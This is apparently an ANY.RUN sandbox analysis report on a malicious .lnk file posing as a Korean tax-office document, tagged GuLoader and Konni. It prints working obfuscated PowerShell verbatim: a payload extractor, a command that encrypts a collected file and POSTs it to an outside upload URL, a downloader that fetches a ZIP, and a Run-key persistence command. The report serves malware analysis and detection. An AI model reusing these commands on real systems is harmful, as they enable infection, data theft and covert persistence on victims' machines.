File name:

오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp.lnk

Full analysis: https://app.any.run/tasks/935fbb73-c785-48cc-a7cc-9918c3ab9c73
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: January 21, 2025, 06:37:03
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: guloader, exfiltration, apt, konni, spyware
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, Unicoded, HasEnvironment, PreferEnvironmentPath, length=0, window=showminnoactive
MD5: F162170214CED849E4E8E6FDB29A0C61
SHA1: F99BABE6E5D219C74E8CC9703053AB02C529BF16
SHA256: A1B67CFB080F4D1E4CBB0019A30259CB291F56C0ADA02E2CA1028F675B187727
SSDEEP: 3072:/mJaq11111111L11111C1ilB11O11V1W111811u111n1v111c1111NUTcu2cdTm4:cPccmQL0EsUfRlxEWHOg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Detected an obfuscated command line used with Guloader

      • powershell.exe (PID: 6324)
    • Changes the autorun value in the registry

      • reg.exe (PID: 2972)
    • KONNI has been detected (SURICATA)

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 6320)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 6252)
      • cmd.exe (PID: 6180)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6180)
      • cmd.exe (PID: 6252)
    • Unpacks CAB file

      • expand.exe (PID: 1944)
      • expand.exe (PID: 236)
    • Manipulates environment variables

      • powershell.exe (PID: 6324)
    • Executable content was dropped or overwritten

      • expand.exe (PID: 1944)
    • Likely accesses (executes) a file from the Public directory

      • expand.exe (PID: 1944)
      • wscript.exe (PID: 6300)
      • cmd.exe (PID: 6440)
      • reg.exe (PID: 2972)
      • powershell.exe (PID: 5464)
      • unzip.exe (PID: 5080)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6320)
      • expand.exe (PID: 236)
    • The process executes VB scripts

      • powershell.exe (PID: 6324)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6440)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6320)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 6300)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6440)
      • cmd.exe (PID: 6180)
    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 6440)
      • cmd.exe (PID: 6180)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6300)
    • Unpacks password protected archive

      • cmd.exe (PID: 6440)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 6440)
    • Removes files via Powershell

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6324)
    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 6440)
    • The process connected to a server suspected of theft

      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 6252)
  • INFO

    • The process uses the downloaded file

      • powershell.exe (PID: 6324)
    • Reads the machine GUID from the registry

      • expand.exe (PID: 1944)
    • Checks supported languages

      • expand.exe (PID: 1944)
      • unzip.exe (PID: 5080)
      • expand.exe (PID: 236)
    • Checks transactions between databases Windows and Oracle

      • wscript.exe (PID: 6300)
    • Manual execution by a user

      • cmd.exe (PID: 6440)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6320)
      • powershell.exe (PID: 6324)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6320)
    • Disables trace logs

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)
    • Checks proxy server information

      • powershell.exe (PID: 5464)
      • powershell.exe (PID: 648)
      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6320)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 648)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6324)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6688)
      • powershell.exe (PID: 6356)
      • powershell.exe (PID: 6940)
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: Description, CommandArgs, IconFile, Unicode, ExpString, PreferEnvPath
FileAttributes: (none)
TargetFileSize: -
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
Description: hwp File
CommandLineArguments: /c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function 
product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )
IconFileName: .hwp
No data.
All screenshots are available in the full report
Total processes: 152
Monitored processes: 25
Malicious processes: 9
Suspicious processes: 2

Behavior graph

Process nodes in the order shown in the graph ("no specs" marks a process with no indicators; #GULOADER and #KONNI are tag labels): start, cmd.exe (no specs), conhost.exe (no specs), cmd.exe (no specs), cmd.exe (no specs), findstr.exe (no specs), powershell.exe #GULOADER (no specs), openwith.exe (no specs), expand.exe, wscript.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), reg.exe, powershell.exe, unzip.exe (no specs), systeminfo.exe (no specs), tiworker.exe (no specs), timeout.exe (no specs), powershell.exe #KONNI, powershell.exe #KONNI, powershell.exe #KONNI, powershell.exe #KONNI, powershell.exe, expand.exe (no specs), timeout.exe (no specs), svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
236
CMD:
expand rBZlI.cab -F:* C:\Users\Public\Documents\
Path:
C:\Windows\System32\expand.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
648powershell -command "function MveQVbIDJW{param ($mJXxJazxawo,$LSYuJYQDZGLI);$CenAoEJDnreL = [System.Text.Encoding]::UTF8.GetBytes($mJXxJazxawo); $vuHEtbxgvE = [System.Text.Encoding]::UTF8.GetBytes($LSYuJYQDZGLI);$laRcinPokW = New-Object byte[](256);$DfEWndQDqBZg = New-Object byte[](256);for ($RxCRKNEbwbqo = 0; $RxCRKNEbwbqo -lt 256; $RxCRKNEbwbqo++) {$laRcinPokW[$RxCRKNEbwbqo] = $RxCRKNEbwbqo;$DfEWndQDqBZg[$RxCRKNEbwbqo] = $vuHEtbxgvE[$RxCRKNEbwbqo % $vuHEtbxgvE.Length];}$ITGAYvCLSBe = 0;for ($RxCRKNEbwbqo = 0; $RxCRKNEbwbqo -lt 256; $RxCRKNEbwbqo++) {$ITGAYvCLSBe = ($ITGAYvCLSBe + $laRcinPokW[$RxCRKNEbwbqo] + $DfEWndQDqBZg[$RxCRKNEbwbqo]) % 256;$VvxyHPQYzikd = $laRcinPokW[$RxCRKNEbwbqo];$laRcinPokW[$RxCRKNEbwbqo] = $laRcinPokW[$ITGAYvCLSBe];$laRcinPokW[$ITGAYvCLSBe] = $VvxyHPQYzikd;}$ktPhPZJyPx = New-Object byte[] $CenAoEJDnreL.Length;$RxCRKNEbwbqo = 0;$ITGAYvCLSBe = 0;for ($sxXCUmVjSfN = 0; $sxXCUmVjSfN -lt $CenAoEJDnreL.Length; $sxXCUmVjSfN++) {$RxCRKNEbwbqo = ($RxCRKNEbwbqo + 1) % 256;$ITGAYvCLSBe = ($ITGAYvCLSBe + $laRcinPokW[$RxCRKNEbwbqo]) % 256;$VvxyHPQYzikd = $laRcinPokW[$RxCRKNEbwbqo];$laRcinPokW[$RxCRKNEbwbqo] = $laRcinPokW[$ITGAYvCLSBe];$laRcinPokW[$ITGAYvCLSBe] = $VvxyHPQYzikd;$jfuHvlVICC = ($laRcinPokW[$RxCRKNEbwbqo] + $laRcinPokW[$ITGAYvCLSBe]) % 256;$ktPhPZJyPx[$sxXCUmVjSfN] = $CenAoEJDnreL[$sxXCUmVjSfN] -bxor $laRcinPokW[$jfuHvlVICC];}$QngmMtEmUeKu = [System.Convert]::ToBase64String($ktPhPZJyPx);return $QngmMtEmUeKu;};$hPcNWDxSjIIJ=(Get-Date).Ticks.ToString();$hBHdjYuVZDuC='http://www.fantasiasognorealta.com/wp-includes/js/src/upload.php';$FzWkQjsuSZD='DESKTOP-JGLLJLD_down.txt';$CtdlRLSbriP='C:\Users\Public\Documents\d1.txt';$xKjSymXJJJ=gc -Path $CtdlRLSbriP -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$FzWkQjsuSZD=MveQVbIDJW -mJXxJazxawo $FzWkQjsuSZD -LSYuJYQDZGLI $hPcNWDxSjIIJ;$xKjSymXJJJ=MveQVbIDJW -mJXxJazxawo $xKjSymXJJJ -LSYuJYQDZGLI $hPcNWDxSjIIJ;$cdvzREusfY = 
[System.Web.HttpUtility]::ParseQueryString('');$cdvzREusfY['fn']=$FzWkQjsuSZD;$cdvzREusfY['fd']=$xKjSymXJJJ;$cdvzREusfY['r']=$hPcNWDxSjIIJ;$MrTvsvMKJRW=$cdvzREusfY.ToString();$BHRwVBjqBO=[System.Text.Encoding]::UTF8.GetBytes($MrTvsvMKJRW);$IxupVhaWcMC=[System.Net.WebRequest]::Create($hBHdjYuVZDuC);$IxupVhaWcMC.Method='PO'+'ST';$IxupVhaWcMC.ContentType='appl'+'ic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'le'+'nco'+'ded';$IxupVhaWcMC.ContentLength=$BHRwVBjqBO.Length;$vkRnWVbmxrvs = $IxupVhaWcMC.GetRequestStream();$vkRnWVbmxrvs.Write($BHRwVBjqBO,0,$BHRwVBjqBO.Length);$vkRnWVbmxrvs.Close();$UNGzfRydOy=$IxupVhaWcMC.GetResponse();if($UNGzfRydOy.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $CtdlRLSbriP;$EaOwWEqLXycJ='C:\Users\Public\Documents\up'+'o'+'k.t'+'xt';New-Item -ItemType File -Path $EaOwWEqLXycJ;}" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
1944
CMD:
"C:\WINDOWS\system32\expand.exe" C:\Users\Public\egyptian.cab -F:* C:\Users\Public\documents
Path:
C:\Windows\System32\expand.exe
Parent process:
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
PID:
2192
CMD:
C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache
Path:
C:\Windows\System32\svchost.exe
Parent process:
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID:
2972
CMD:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v startsvc1 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
Path:
C:\Windows\System32\reg.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
PID:
5080
CMD:
unzip.exe -o -P "a0" "C:\Users\Public\Documents\di3726.zip"
Path:
C:\Users\Public\Documents\unzip.exe
Parent process:
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
9
Modules
Images
c:\users\public\documents\unzip.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
PID:
5112
CMD:
timeout -t 57 /nobreak
Path:
C:\Windows\System32\timeout.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
5464powershell -command "function MLGBRrjjOTu{param ($jqCTIhZAxl,$kfNUsRSHCDz);$JBIEmUsgSR = [System.Text.Encoding]::UTF8.GetBytes($jqCTIhZAxl); $ECAXqTKcgSu = [System.Text.Encoding]::UTF8.GetBytes($kfNUsRSHCDz);$VnsNRPPnlwed = New-Object byte[](256);$kxQuNhgwoH = New-Object byte[](256);for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$VnsNRPPnlwed[$nXgNVlbzwrTx] = $nXgNVlbzwrTx;$kxQuNhgwoH[$nXgNVlbzwrTx] = $ECAXqTKcgSu[$nXgNVlbzwrTx % $ECAXqTKcgSu.Length];}$UYdROjElaQ = 0;for ($nXgNVlbzwrTx = 0; $nXgNVlbzwrTx -lt 256; $nXgNVlbzwrTx++) {$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx] + $kxQuNhgwoH[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;}$MHAheRKHRFeM = New-Object byte[] $JBIEmUsgSR.Length;$nXgNVlbzwrTx = 0;$UYdROjElaQ = 0;for ($NwUmxAYFGscW = 0; $NwUmxAYFGscW -lt $JBIEmUsgSR.Length; $NwUmxAYFGscW++) {$nXgNVlbzwrTx = ($nXgNVlbzwrTx + 1) % 256;$UYdROjElaQ = ($UYdROjElaQ + $VnsNRPPnlwed[$nXgNVlbzwrTx]) % 256;$FyjXnQqYoK = $VnsNRPPnlwed[$nXgNVlbzwrTx];$VnsNRPPnlwed[$nXgNVlbzwrTx] = $VnsNRPPnlwed[$UYdROjElaQ];$VnsNRPPnlwed[$UYdROjElaQ] = $FyjXnQqYoK;$zBXVlJeTklt = ($VnsNRPPnlwed[$nXgNVlbzwrTx] + $VnsNRPPnlwed[$UYdROjElaQ]) % 256;$MHAheRKHRFeM[$NwUmxAYFGscW] = $JBIEmUsgSR[$NwUmxAYFGscW] -bxor $VnsNRPPnlwed[$zBXVlJeTklt];}$KzigMrYemXG = [System.Convert]::ToBase64String($MHAheRKHRFeM);return $KzigMrYemXG;};$QlHKpkaDhTHf = 'https://raleighice.com/wp-includes/js/inc/get.php?ra=iew&zw=lk0100';$liLROUyJNri = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web';$aVmsVMkBoEvn=(Get-Date).Ticks.ToString();$WwSdMQbZUdfJ = $QlHKpkaDhTHf.Split('?')[1];$qNNYHElwOS = MLGBRrjjOTu -jqCTIhZAxl $WwSdMQbZUdfJ -kfNUsRSHCDz $aVmsVMkBoEvn;$QlHKpkaDhTHf=$QlHKpkaDhTHf.Split('?')[0]+'?'+$aVmsVMkBoEvn+'='+[System.Web.HttpUtility]::UrlEncode($qNNYHElwOS);iwr -Uri $QlHKpkaDhTHf -OutFile $liLROUyJNri;" 
Path:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
5548
CMD:
systeminfo
Path:
C:\Windows\System32\systeminfo.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6180"C:\WINDOWS\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\WINDOWS\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function harmless{param($island); <#resolution pervert#>$honest = $island.substring(0,$island.length-4) + ''; <#conduct distress#>return $honest;};function crime{param($clay);<#consult invest#> remove-item <#composing legislative#> -path $clay <#indulgence insoluble#> -force;};function ellipse{param($igneous,$reducing,$often,$brown,$ship);<#demand cleave#> $roundish=New-Object System.IO.FileStream(<#standard board#>$igneous,<#inscription winding#>[System.IO.FileMode]::Open,<#narrowly social#>[System.IO.FileAccess]::Read);<#qualified turning#> $roundish.Seek(<#almost corner#>$reducing,[System.IO.SeekOrigin]::Begin);<#training steam#> $inheritance=$often*0x01;<#restraint tumult#> $feed=New-Object byte[] <#angles cautious#>$often; <#sculpture offspring#> $leader=New-Object byte[] <#domestic controversy#>$inheritance; <#milk fellow#>$roundish.Read(<#perpetual array#>$leader,0,<#shape graduated#>$inheritance); $roundish.Close();$people=0;while($people -lt $often){<#roof alarm#>$feed[$people]=$leader[$people*0x01] -bxor $brown;$people++;}<#rule conquer#> set-content $ship <#edible fate#> $feed -Encoding <#going pricking#> Byte;};function sensitive{param($sour, $diamond);<#bail milk#> expand $sour <#moment flatter#> -F:* $diamond;};function sprinkle{$obstruction = $env:public<#devotion sometimes#> + '\' +<#playing inclosure#> 'doc'+'ume'+'nt'+'s';<#eastern strike#> return $obstruction;};function wife{param($forming); <#fruitful formula#>$slide = Split-Path $forming;<#dexterity customary#> return $slide;};function stately{return Get-Location;};function conquest{<#strength prove#>return $env:Temp;};function prejudice{$chalk = stately; $chart = line -vigorous $chalk; <#restrict duty#>if($chart.length -eq 0) {$chalk = conquest; <#estimation octave#>$chart = line -vigorous $chalk;} return $chart;};function 
product{$extraction = $env:public<#fourth northern#> + '\' + 'eg'+'ypt'+'ia'+'n.c'+'ab';<#strength ending#> return $extraction;};function carrying{$rhyme = $env:public<#likeness precipitate#>+'\do'+'cume'+'nt'+'s\s'+'tart'+'.vb'+'s';<#token electric#> return $rhyme;};function line{param($vigorous); $raised = @(); $happiness = [System.IO.Directory]::GetDirectories($vigorous); $surpass = [System.IO.Directory]::GetFiles($vigorous); foreach ($file in $surpass) { $fright = New-Object System.IO.FileInfo $file; if ($fright.Extension -ieq '.ln'+'k' -and $fright.Length -eq 0x000FB845) { $raised += $fright.FullName; } }; foreach ($subDir in $happiness) { $raised += line -dir $subDir; } return $raised[0];};$pottery = prejudice;<#grateful cushion#>$refractory = wife -forming $pottery;<#preacher labor#> $convey = harmless -island $pottery;ellipse -igneous <#but weak#> $pottery -reducing <#nasal discern#> 0x00002192 -often 0x00006C00 -brown <#insoluble division#> 0x2B -ship <#golden collection#> $convey;<#accept limit#> & $convey;$manuscript=product;<#determine wicked#>ellipse -igneous <#prolific warm#> $pottery -reducing <#pour attended#> 0x00008D92 -often <#subjected provoke#> 0x00013CE1 -brown <#eagle political#> 0x72 -ship <#receptacle countries#> $manuscript;<#panel male#>crime -clay $pottery;$naturally = sprinkle;<#cluster desire#>sensitive -sour $manuscript -diamond <#wreck confirm#>$naturally;<#plastic fellow#>crime -clay $manuscript;$internal = <#reducing precedent#>carrying;<#prominent interval#>& $internal;") )C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events: 41 764
Read events: 41 761
Write events: 3
Delete events: 0

Modification events

(PID) Process: (2972) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: startsvc1
Value: C:\Users\Public\Documents\start.vbs

(PID) Process: (6532) TiWorker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write
Name: SessionIdHigh
Value: 31157198

(PID) Process: (6532) TiWorker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write
Name: SessionIdLow
Value:
Executable files: 2
Suspicious files: 3
Text files: 34
Unknown types: 0

Dropped files

PID | Process | Filename | Type
6324 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lpxingy3.wgt.psm1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1944 | expand.exe | C:\Users\Public\Documents\59149229.bat | text
MD5:E31618289C25D2273F439F0ADDA2EF64
SHA256:DC97AFB0D2AE4876FD81C8BD679950B6F14FDFA34C8F7E3919B27ED845E6E1DC
1944 | expand.exe | C:\Users\Public\Documents\03828398.bat | text
MD5:179978B545DAAF7FA27D422015F24C87
SHA256:DB4A02E984E1C12105CB6C2C196669A5D93E3E24D54A917D168A9A7F73898EE4
1944 | expand.exe | C:\Users\Public\Documents\98755194.bat | text
MD5:F2CD33F7CE1F794881AA53AC19E6049D
SHA256:083E10819A8884D4085A9A53B2B8C88CE3CE8BB4DC9F4C2E1CC3F423C08B01B2
1944 | expand.exe | C:\Users\Public\Documents\unzip.exe | executable
MD5:75375C22C72F1BEB76BEA39C22A1ED68
SHA256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
1944 | expand.exe | C:\Users\Public\Documents\start.vbs | text
MD5:11CDEFEFA9DE934730F266E6A08E7E16
SHA256:BE5A657DAB3DF9C50B6AA15FD214E9BA9879DF7899E7F844BBBC6767E614E6AB
6324 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3a5j1m2d.3bw.ps1 | text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6324 | powershell.exe | C:\Users\admin\AppData\Local\Temp\오류발견 수정신고 제출 요청 안내(국세징수법 시행규칙).hwp | binary
MD5:F0854CC47914B9C62F467A7CEF7CE8B3
SHA256:6AB0B9F9743A59268EBA1B033ACEB245A829260A250F5E6A8DE066DEC6E14026
6324 | powershell.exe | C:\Users\Public\egyptian.cab | compressed
MD5:957ADDA6FD9BDB8DB2EF6A14F224F769
